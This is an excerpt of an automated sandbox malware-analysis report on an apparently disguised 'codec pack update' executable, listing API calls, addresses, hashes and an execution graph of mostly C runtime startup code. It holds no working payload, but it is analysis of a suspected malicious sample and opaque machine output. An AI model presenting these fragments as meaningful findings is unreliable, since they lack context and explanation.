                                                                          • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
                                                                          • MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
                                                                          • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: StringType$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 3852931651-0
                                                                          • Opcode ID: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                          • Instruction ID: 80e02ee10c910d5558e83bb499fc0990029bfad3b9a08e1f349c60d3d592f295
                                                                          • Opcode Fuzzy Hash: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                          • Instruction Fuzzy Hash: D5416C72540619AFCF109FA4DD85AAF3F69FB08710F10443AF912F6290C3399A619BA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetVersionExA.KERNEL32 ref: 00403131
                                                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                          • API String ID: 1385375860-4131005785
                                                                          • Opcode ID: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                          • Instruction ID: 15aa791d7551e4111e6245bb3a1b8270ecaa7052e860947edacf4d8c3684a0cc
                                                                          • Opcode Fuzzy Hash: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                          • Instruction Fuzzy Hash: 9C3102719412486DEB31AB706C45BDA7F6C9B0A709F2404FFD145FA2C2D6398F898B19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 0040489B
                                                                          • GetFileType.KERNEL32(00000800), ref: 00404941
                                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
                                                                          • GetFileType.KERNEL32(00000000), ref: 004049A8
                                                                          • SetHandleCount.KERNEL32 ref: 004049DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType$CountInfoStartup
                                                                          • String ID:
                                                                          • API String ID: 1710529072-0
                                                                          • Opcode ID: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                          • Instruction ID: 5bba43567eb9c7eebad7166e054eef6f33a3e935d61c9f19950f113686a4cc82
                                                                          • Opcode Fuzzy Hash: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                          • Instruction Fuzzy Hash: 585124F25003118BD7208B38CD48B673BA0EB91331F19873AE696BB2E1D738C855875A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
                                                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual$FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 714016831-0
                                                                          • Opcode ID: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                          • Instruction ID: 29c7c306398b504596bf767bafbbf3f0594b5aced9f79ae4ff8fd419923c464c
                                                                          • Opcode Fuzzy Hash: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                          • Instruction Fuzzy Hash: 6831F071A447019BE3208F24DD45B22BFB8EB44B5AF10813AE566BB3D1E778B9008B5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Info
                                                                          • String ID: $
                                                                          • API String ID: 1807457897-3032137957
                                                                          • Opcode ID: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                          • Instruction ID: 09f2f023d99f136d6c1d54f1ac7197ff319f79a86c6e1a8e0271cc1bcc75f35e
                                                                          • Opcode Fuzzy Hash: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                          • Instruction Fuzzy Hash: 474156310047586AEB15D614DE5DBFB7FA9EB02700F1400F6E946F71D2C2790924DFAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe,00000104,?,00000000,?,?,?,?,00402FB0), ref: 004044E6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: FileModuleName
                                                                          • String ID: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe$h5`
                                                                          • API String ID: 514040917-2106218412
                                                                          • Opcode ID: e4c2509f1a48c11c220fc4324a28902978b1387e4841e844e69e582ca8f90123
                                                                          • Instruction ID: a353362e766ed3f2c716cac6d89b577610a1520323eec6d1a1738d9fa524379f
                                                                          • Opcode Fuzzy Hash: e4c2509f1a48c11c220fc4324a28902978b1387e4841e844e69e582ca8f90123
                                                                          • Instruction Fuzzy Hash: B2115EB2900218BFD711EF99DD81CAB77BCEB45358B1100BBF605B3241E674AE148BA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
                                                                          • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap$FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 3499195154-0
                                                                          • Opcode ID: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                          • Instruction ID: ab7933d84ada2b962503ad88361c81f9e178ef349f2d38840b4e325d6782f2f4
                                                                          • Opcode Fuzzy Hash: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                          • Instruction Fuzzy Hash: 3E118F712003019FD7218F29EE459167BF5FB84765711853AF152E71B0C372D961CF1A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage: 9.6%
                                                                          Dynamic/Decrypted Code Coverage: 83.9%
                                                                          Signature Coverage: 1.3%
                                                                          Total number of Nodes: 2000
                                                                          Total number of Limit Nodes: 44
RtlEncodePointer 17881->17892 17883 a0846b __init_pointers 17884 a091ba 34 API calls 17883->17884 17884->17715 17886 a0896a 17885->17886 17888 a05cde 17886->17888 17893 a0914c 17886->17893 17888->17718 17889 a090ce 17888->17889 17890 a090e5 TlsAlloc 17889->17890 17891 a05cf4 17889->17891 17891->17718 17891->17723 17892->17883 17894 a09169 InitializeCriticalSectionAndSpinCount 17893->17894 17895 a0915c 17893->17895 17894->17886 17895->17886 17898 a08a02 17896->17898 17899 a08a34 17898->17899 17901 a02eec 17898->17901 17918 a09445 Sleep 17898->17918 17899->17739 17899->17742 17902 a02f67 17901->17902 17912 a02ef8 17901->17912 17903 a08143 _malloc RtlDecodePointer 17902->17903 17904 a02f6d 17903->17904 17906 a05d9b _malloc 58 API calls 17904->17906 17908 a02f5f 17906->17908 17907 a02f2b RtlAllocateHeap 17907->17908 17907->17912 17908->17898 17910 a02f03 17910->17912 17919 a08613 17910->17919 17928 a08670 17910->17928 17963 a0825c 17910->17963 17911 a02f53 17968 a05d9b 17911->17968 17912->17907 17912->17910 17912->17911 17916 a02f51 17912->17916 17966 a08143 RtlDecodePointer 17912->17966 17917 a05d9b _malloc 58 API calls 17916->17917 17917->17908 17918->17898 17971 a100be 17919->17971 17921 a0861a 17922 a08627 17921->17922 17924 a100be __NMSG_WRITE 59 API calls 17921->17924 17923 a08670 __NMSG_WRITE 59 API calls 17922->17923 17926 a08649 17922->17926 17925 a0863f 17923->17925 17924->17922 17927 a08670 __NMSG_WRITE 59 API calls 17925->17927 17926->17910 17927->17926 17929 a0868e __NMSG_WRITE 17928->17929 17931 a100be __NMSG_WRITE 55 API calls 17929->17931 17962 a087b5 17929->17962 17933 a086a1 17931->17933 17932 a0881e 17932->17910 17934 a087ba GetStdHandle 17933->17934 17935 a100be __NMSG_WRITE 55 API calls 17933->17935 17938 a087c8 _strlen 17934->17938 17934->17962 17936 a086b2 17935->17936 17936->17934 17937 a086c4 17936->17937 17937->17962 17987 a0f47d 17937->17987 17940 a08801 WriteFile 17938->17940 17938->17962 17940->17962 17942 a086f1 GetModuleFileNameW 17944 
a08711 17942->17944 17952 a08721 __NMSG_WRITE 17942->17952 17943 a08822 18046 a04e45 IsProcessorFeaturePresent 17943->18046 17946 a0f47d __NMSG_WRITE 55 API calls 17944->17946 17946->17952 17949 a08767 17949->17943 18005 a0f411 17949->18005 17952->17943 17952->17949 17996 a0f4f2 17952->17996 17957 a0f411 __NMSG_WRITE 55 API calls 17959 a0879e 17957->17959 17959->17943 18039 a0448b 17962->18039 18132 a08228 GetModuleHandleExW 17963->18132 17967 a08156 17966->17967 17967->17912 18135 a05bb2 GetLastError 17968->18135 17970 a05da0 17970->17916 17972 a100c8 17971->17972 17973 a100d2 17972->17973 17974 a05d9b _malloc 59 API calls 17972->17974 17973->17921 17975 a100ee 17974->17975 17978 a04e35 17975->17978 17981 a04e0a RtlDecodePointer 17978->17981 17982 a04e1d 17981->17982 17983 a04e45 __invoke_watson 8 API calls 17982->17983 17984 a04e34 17983->17984 17985 a04e0a __gmtime64_s 8 API calls 17984->17985 17986 a04e41 17985->17986 17986->17921 17988 a0f488 17987->17988 17989 a0f496 17987->17989 17988->17989 17992 a0f4af 17988->17992 17990 a05d9b _malloc 59 API calls 17989->17990 17991 a0f4a0 17990->17991 17993 a04e35 __gmtime64_s 9 API calls 17991->17993 17994 a086e4 17992->17994 17995 a05d9b _malloc 59 API calls 17992->17995 17993->17994 17994->17942 17994->17943 17995->17991 17997 a0f500 17996->17997 17999 a0f509 17997->17999 18000 a0f504 17997->18000 18002 a0f543 17997->18002 17998 a05d9b _malloc 59 API calls 18004 a0f534 17998->18004 17999->17949 18000->17998 18000->17999 18001 a04e35 __gmtime64_s 9 API calls 18001->17999 18002->17999 18003 a05d9b _malloc 59 API calls 18002->18003 18003->18004 18004->18001 18006 a0f42b 18005->18006 18008 a0f41d 18005->18008 18007 a05d9b _malloc 59 API calls 18006->18007 18013 a0f435 18007->18013 18008->18006 18011 a0f457 18008->18011 18009 a04e35 __gmtime64_s 9 API calls 18010 a08787 18009->18010 18010->17943 18010->17957 18011->18010 18012 a05d9b _malloc 59 API calls 18011->18012 18012->18013 18013->18009 18040 a04493 18039->18040 
18041 a04495 IsProcessorFeaturePresent 18039->18041 18040->17932 18043 a094cf 18041->18043 18081 a0947e IsDebuggerPresent 18043->18081 18047 a04e50 18046->18047 18089 a04cd8 18047->18089 18082 a09493 ___raise_securityfailure 18081->18082 18087 a09468 SetUnhandledExceptionFilter UnhandledExceptionFilter 18082->18087 18084 a0949b ___raise_securityfailure 18088 a09453 GetCurrentProcess TerminateProcess 18084->18088 18086 a094b8 18086->17932 18087->18084 18088->18086 18090 a04cf2 ___raise_securityfailure __gmtime64_s 18089->18090 18091 a04d12 IsDebuggerPresent 18090->18091 18097 a09468 SetUnhandledExceptionFilter UnhandledExceptionFilter 18091->18097 18093 a0448b __atodbl_l 6 API calls 18094 a04dd6 ___raise_securityfailure 18094->18093 18097->18094 18133 a08241 GetProcAddress 18132->18133 18134 a08253 ExitProcess 18132->18134 18133->18134 18136 a0910b __CRT_INIT@12 TlsGetValue 18135->18136 18137 a05bc7 18136->18137 18138 a05c15 SetLastError 18137->18138 18139 a089ac __calloc_crt 56 API calls 18137->18139 18138->17970 18140 a05bda 18139->18140 18140->18138 18141 a0912a __CRT_INIT@12 TlsSetValue 18140->18141 18142 a05bee 18141->18142 18143 a05bf4 18142->18143 18144 a05c0c 18142->18144 18145 a05c21 __initptd 56 API calls 18143->18145 18146 a02eb4 _free 56 API calls 18144->18146 18147 a05bfc GetCurrentThreadId 18145->18147 18148 a05c12 18146->18148 18147->18138 18148->18138 18152 a08997 RtlLeaveCriticalSection 18149->18152 18151 a0b4bd 18151->17754 18152->18151 18154 a0b5e6 18153->18154 18158 a0b64a 18154->18158 18163 a11516 18154->18163 18156 a0b567 18156->17773 18156->17774 18157 a11516 _parse_cmdline 59 API calls 18157->18158 18158->18156 18158->18157 18160 a051d3 18159->18160 18161 a051da 18159->18161 18219 a05527 18160->18219 18161->17767 18166 a114bc 18163->18166 18169 a021bb 18166->18169 18170 a021cc 18169->18170 18176 a02219 18169->18176 18177 a05b9a 18170->18177 18172 a021d2 18173 a021f9 18172->18173 18182 a050ff 18172->18182 18173->18176 18197 a05481 18173->18197 
18176->18154 18178 a05bb2 __getptd_noexit 59 API calls 18177->18178 18179 a05ba0 18178->18179 18180 a05bad 18179->18180 18181 a0837f __amsg_exit 59 API calls 18179->18181 18180->18172 18181->18180 18183 a0510b __fcloseall 18182->18183 18184 a05b9a FindHandler 59 API calls 18183->18184 18185 a05114 18184->18185 18198 a0548d __fcloseall 18197->18198 18199 a05b9a FindHandler 59 API calls 18198->18199 18220 a05533 __fcloseall 18219->18220 18221 a05b9a FindHandler 59 API calls 18220->18221 18222 a0553b 18221->18222 18223 a05481 _LocaleUpdate::_LocaleUpdate 59 API calls 18222->18223 18224 a05545 18223->18224 18244 a05222 18224->18244 18227 a089f4 __malloc_crt 59 API calls 18228 a05567 18227->18228 18229 a05694 __fcloseall 18228->18229 18251 a056cf 18228->18251 18229->18161 18245 a021bb _LocaleUpdate::_LocaleUpdate 59 API calls 18244->18245 18246 a05232 18245->18246 18247 a05241 GetOEMCP 18246->18247 18248 a05253 18246->18248 18249 a0526a 18247->18249 18248->18249 18250 a05258 GetACP 18248->18250 18249->18227 18249->18229 18250->18249 18324 a06c15 18323->18324 18325 a06c07 18323->18325 18326 a05d9b _malloc 59 API calls 18324->18326 18325->18324 18329 a06c2b 18325->18329 18327 a06c1c 18326->18327 18328 a04e35 __gmtime64_s 9 API calls 18327->18328 18330 a06c26 18328->18330 18329->18330 18331 a05d9b _malloc 59 API calls 18329->18331 18330->17786 18331->18327 18333 a0d222 RtlEncodePointer 18332->18333 18333->18333 18334 a0d23c 18333->18334 18334->17796 18402 a09103 TlsFree 18401->18402 18403 a090ff 18401->18403 18402->17802 18403->17802 18405 a10403 18404->18405 18409 a1041e 18404->18409 18406 a1040f 18405->18406 18405->18409 18408 a05d9b _malloc 58 API calls 18406->18408 18407 a1042e RtlAllocateHeap 18407->18409 18410 a10414 18407->18410 18408->18410 18409->18407 18409->18410 18411 a08143 _malloc RtlDecodePointer 18409->18411 18410->17848 18411->18409 18412->17852 18419 a08997 RtlLeaveCriticalSection 18413->18419 18415 a05c84 18415->17862 18420 a08997 RtlLeaveCriticalSection 
18416->18420 18418 a05cd2 18418->17865 18419->18415 18420->18418 18423 a05a3b __fcloseall 18421->18423 18422 a05a54 18425 a05a63 18422->18425 18427 a02eb4 _free 59 API calls 18422->18427 18423->18422 18424 a02eb4 _free 59 API calls 18423->18424 18426 a05b43 __fcloseall 18423->18426 18424->18422 18428 a02eb4 _free 59 API calls 18425->18428 18430 a05a72 18425->18430 18426->17879 18427->18425 18428->18430 18429 a05a81 18432 a05a90 18429->18432 18433 a02eb4 _free 59 API calls 18429->18433 18430->18429 18431 a02eb4 _free 59 API calls 18430->18431 18431->18429 18434 a05a9f 18432->18434 18435 a02eb4 _free 59 API calls 18432->18435 18433->18432 18436 a05aae 18434->18436 18437 a02eb4 _free 59 API calls 18434->18437 18435->18434 18438 a05ac0 18436->18438 18439 a02eb4 _free 59 API calls 18436->18439 18437->18436 18440 a0882d __lock 59 API calls 18438->18440 18439->18438 18443 a05ac8 18440->18443 18441 a05aeb 18453 a05b4f 18441->18453 18443->18441 18445 a02eb4 _free 59 API calls 18443->18445 18445->18441 18446 a0882d __lock 59 API calls 18451 a05aff ___removelocaleref 18446->18451 18447 a05b30 18486 a05b5b 18447->18486 18450 a02eb4 _free 59 API calls 18450->18426 18451->18447 18456 a04f05 18451->18456 18489 a08997 RtlLeaveCriticalSection 18453->18489 18455 a05af8 18455->18446 18457 a04f7e 18456->18457 18459 a04f1a 18456->18459 18458 a02eb4 _free 59 API calls 18457->18458 18460 a04fcb 18457->18460 18461 a04f9f 18458->18461 18459->18457 18468 a04f4b 18459->18468 18470 a02eb4 _free 59 API calls 18459->18470 18462 a04ff4 18460->18462 18530 a0d47d 18460->18530 18464 a02eb4 _free 59 API calls 18461->18464 18466 a05053 18462->18466 18482 a02eb4 59 API calls _free 18462->18482 18467 a04fb2 18464->18467 18472 a02eb4 _free 59 API calls 18466->18472 18473 a02eb4 _free 59 API calls 18467->18473 18474 a02eb4 _free 59 API calls 18468->18474 18485 a04f69 18468->18485 18469 a02eb4 _free 59 API calls 18475 a04f73 18469->18475 18476 a04f40 18470->18476 18471 a02eb4 _free 59 API calls 
18471->18462 18478 a05059 18472->18478 18479 a04fc0 18473->18479 18480 a04f5e 18474->18480 18481 a02eb4 _free 59 API calls 18475->18481 18490 a0d31a 18476->18490 18478->18447 18483 a02eb4 _free 59 API calls 18479->18483 18518 a0d416 18480->18518 18481->18457 18482->18462 18483->18460 18485->18469 18706 a08997 RtlLeaveCriticalSection 18486->18706 18488 a05b3d 18488->18450 18489->18455 18491 a0d412 18490->18491 18492 a0d329 18490->18492 18491->18468 18493 a0d33a 18492->18493 18495 a02eb4 _free 59 API calls 18492->18495 18494 a0d34c 18493->18494 18496 a02eb4 _free 59 API calls 18493->18496 18497 a0d35e 18494->18497 18498 a02eb4 _free 59 API calls 18494->18498 18495->18493 18496->18494 18499 a0d370 18497->18499 18500 a02eb4 _free 59 API calls 18497->18500 18498->18497 18501 a0d382 18499->18501 18503 a02eb4 _free 59 API calls 18499->18503 18500->18499 18502 a0d394 18501->18502 18504 a02eb4 _free 59 API calls 18501->18504 18505 a0d3a6 18502->18505 18506 a02eb4 _free 59 API calls 18502->18506 18503->18501 18504->18502 18507 a0d3b8 18505->18507 18508 a02eb4 _free 59 API calls 18505->18508 18506->18505 18509 a0d3ca 18507->18509 18511 a02eb4 _free 59 API calls 18507->18511 18508->18507 18510 a0d3dc 18509->18510 18512 a02eb4 _free 59 API calls 18509->18512 18513 a0d3ee 18510->18513 18514 a02eb4 _free 59 API calls 18510->18514 18511->18509 18512->18510 18515 a0d400 18513->18515 18516 a02eb4 _free 59 API calls 18513->18516 18514->18513 18515->18491 18517 a02eb4 _free 59 API calls 18515->18517 18516->18515 18517->18491 18519 a0d421 18518->18519 18529 a0d479 18518->18529 18520 a02eb4 _free 59 API calls 18519->18520 18521 a0d431 18519->18521 18520->18521 18522 a02eb4 _free 59 API calls 18521->18522 18524 a0d443 18521->18524 18522->18524 18523 a0d455 18526 a0d467 18523->18526 18527 a02eb4 _free 59 API calls 18523->18527 18524->18523 18525 a02eb4 _free 59 API calls 18524->18525 18525->18523 18528 a02eb4 _free 59 API calls 18526->18528 18526->18529 18527->18526 18528->18529 
18529->18485 18531 a04fe9 18530->18531 18532 a0d48c 18530->18532 18531->18471 18533 a02eb4 _free 59 API calls 18532->18533 18534 a0d494 18533->18534 18535 a02eb4 _free 59 API calls 18534->18535 18536 a0d49c 18535->18536 18537 a02eb4 _free 59 API calls 18536->18537 18538 a0d4a4 18537->18538 18539 a02eb4 _free 59 API calls 18538->18539 18540 a0d4ac 18539->18540 18541 a02eb4 _free 59 API calls 18540->18541 18542 a0d4b4 18541->18542 18543 a02eb4 _free 59 API calls 18542->18543 18544 a0d4bc 18543->18544 18545 a02eb4 _free 59 API calls 18544->18545 18546 a0d4c3 18545->18546 18547 a02eb4 _free 59 API calls 18546->18547 18706->18488 18707 402f22 GetVersion 18731 40325a HeapCreate 18707->18731 18709 402f81 18710 402f86 18709->18710 18711 402f8e 18709->18711 18806 40303d 18710->18806 18743 404842 18711->18743 18715 402f96 GetCommandLineA 18757 404710 18715->18757 18719 402fb0 18789 40440a 18719->18789 18721 402fb5 18722 402fba GetStartupInfoA 18721->18722 18802 4043b2 18722->18802 18724 402fcc GetModuleHandleA 18726 402ff0 18724->18726 18812 404159 18726->18812 18732 4032b0 18731->18732 18733 40327a 18731->18733 18732->18709 18819 403112 18733->18819 18736 403296 18739 4032b3 18736->18739 18833 403b08 18736->18833 18737 403289 18831 4032b7 HeapAlloc 18737->18831 18739->18709 18740 403293 18740->18739 18742 4032a4 HeapDestroy 18740->18742 18742->18732 18896 402e70 18743->18896 18746 404861 GetStartupInfoA 18754 404972 18746->18754 18756 4048ad 18746->18756 18749 4049d9 SetHandleCount 18749->18715 18750 404999 GetStdHandle 18752 4049a7 GetFileType 18750->18752 18750->18754 18751 402e70 12 API calls 18751->18756 18752->18754 18753 40491e 18753->18754 18755 404940 GetFileType 18753->18755 18754->18749 18754->18750 18755->18753 18756->18751 18756->18753 18756->18754 18758 40472b GetEnvironmentStringsW 18757->18758 18759 40475e 18757->18759 18760 404733 18758->18760 18762 40473f GetEnvironmentStrings 18758->18762 18759->18760 18761 40474f 18759->18761 18764 404777 
WideCharToMultiByte 18760->18764 18765 40476b GetEnvironmentStringsW 18760->18765 18763 402fa6 18761->18763 18766 4047f1 GetEnvironmentStrings 18761->18766 18767 4047fd 18761->18767 18762->18761 18762->18763 18780 4044c3 18763->18780 18769 4047ab 18764->18769 18770 4047dd FreeEnvironmentStringsW 18764->18770 18765->18763 18765->18764 18766->18763 18766->18767 18771 402e70 12 API calls 18767->18771 18772 402e70 12 API calls 18769->18772 18770->18763 18778 404818 18771->18778 18773 4047b1 18772->18773 18773->18770 18774 4047ba WideCharToMultiByte 18773->18774 18776 4047d4 18774->18776 18777 4047cb 18774->18777 18775 40482e FreeEnvironmentStringsA 18775->18763 18776->18770 18962 403061 18777->18962 18778->18775 18781 4044d5 18780->18781 18782 4044da GetModuleFileNameA 18780->18782 18992 40583b 18781->18992 18784 4044fd 18782->18784 18785 402e70 12 API calls 18784->18785 18786 40451e 18785->18786 18787 40452e 18786->18787 18788 403018 7 API calls 18786->18788 18787->18719 18788->18787 18790 404417 18789->18790 18793 40441c 18789->18793 18791 40583b 19 API calls 18790->18791 18791->18793 18792 402e70 12 API calls 18794 404449 18792->18794 18793->18792 18795 403018 7 API calls 18794->18795 18801 40445d 18794->18801 18795->18801 18796 4044a0 18797 403061 7 API calls 18796->18797 18798 4044ac 18797->18798 18798->18721 18799 402e70 12 API calls 18799->18801 18800 403018 7 API calls 18800->18801 18801->18796 18801->18799 18801->18800 18803 4043bb 18802->18803 18805 4043c0 18802->18805 18804 40583b 19 API calls 18803->18804 18804->18805 18805->18724 18807 403046 18806->18807 18808 40304b 18806->18808 18809 404bc0 7 API calls 18807->18809 18810 404bf9 7 API calls 18808->18810 18809->18808 18811 403054 ExitProcess 18810->18811 19016 40417b 18812->19016 18815 40422e 18816 40423a 18815->18816 18817 404363 UnhandledExceptionFilter 18816->18817 18818 40300a 18816->18818 18817->18818 18842 402d50 18819->18842 18822 403155 GetEnvironmentVariableA 18824 403232 18822->18824 18827 
403174 18822->18827 18823 40313b 18823->18822 18825 40314d 18823->18825 18824->18825 18847 4030e5 GetModuleHandleA 18824->18847 18825->18736 18825->18737 18828 4031b9 GetModuleFileNameA 18827->18828 18829 4031b1 18827->18829 18828->18829 18829->18824 18844 404d4c 18829->18844 18832 4032d3 18831->18832 18832->18740 18834 403b15 18833->18834 18835 403b1c HeapAlloc 18833->18835 18836 403b39 VirtualAlloc 18834->18836 18835->18836 18841 403b71 18835->18841 18837 403b59 VirtualAlloc 18836->18837 18838 403c2e 18836->18838 18839 403c20 VirtualFree 18837->18839 18837->18841 18840 403c36 HeapFree 18838->18840 18838->18841 18839->18838 18840->18841 18841->18740 18843 402d5c GetVersionExA 18842->18843 18843->18822 18843->18823 18849 404d63 18844->18849 18848 4030fc 18847->18848 18848->18825 18851 404d7b 18849->18851 18853 404dab 18851->18853 18856 405aaa 18851->18856 18852 405aaa 6 API calls 18852->18853 18853->18852 18855 404d5f 18853->18855 18860 4059de 18853->18860 18855->18824 18857 405ac8 18856->18857 18859 405abc 18856->18859 18866 405d6e 18857->18866 18859->18851 18862 4059ec 18860->18862 18863 405a09 18860->18863 18861 405a25 18861->18862 18878 405b1f 18861->18878 18862->18853 18863->18861 18864 405aaa 6 API calls 18863->18864 18864->18861 18867 405db7 18866->18867 18868 405d9f GetStringTypeW 18866->18868 18870 405de2 GetStringTypeA 18867->18870 18871 405e06 18867->18871 18868->18867 18869 405dbb GetStringTypeA 18868->18869 18869->18867 18872 405ea3 18869->18872 18870->18872 18871->18872 18874 405e1c MultiByteToWideChar 18871->18874 18872->18859 18874->18872 18875 405e40 18874->18875 18875->18872 18876 405e7a MultiByteToWideChar 18875->18876 18876->18872 18877 405e93 GetStringTypeW 18876->18877 18877->18872 18879 405b4f LCMapStringW 18878->18879 18881 405b6b 18878->18881 18880 405b73 LCMapStringA 18879->18880 18879->18881 18880->18881 18883 405cad 18880->18883 18882 405bb4 LCMapStringA 18881->18882 18885 405bd1 18881->18885 18882->18883 18883->18862 18884 405be7 
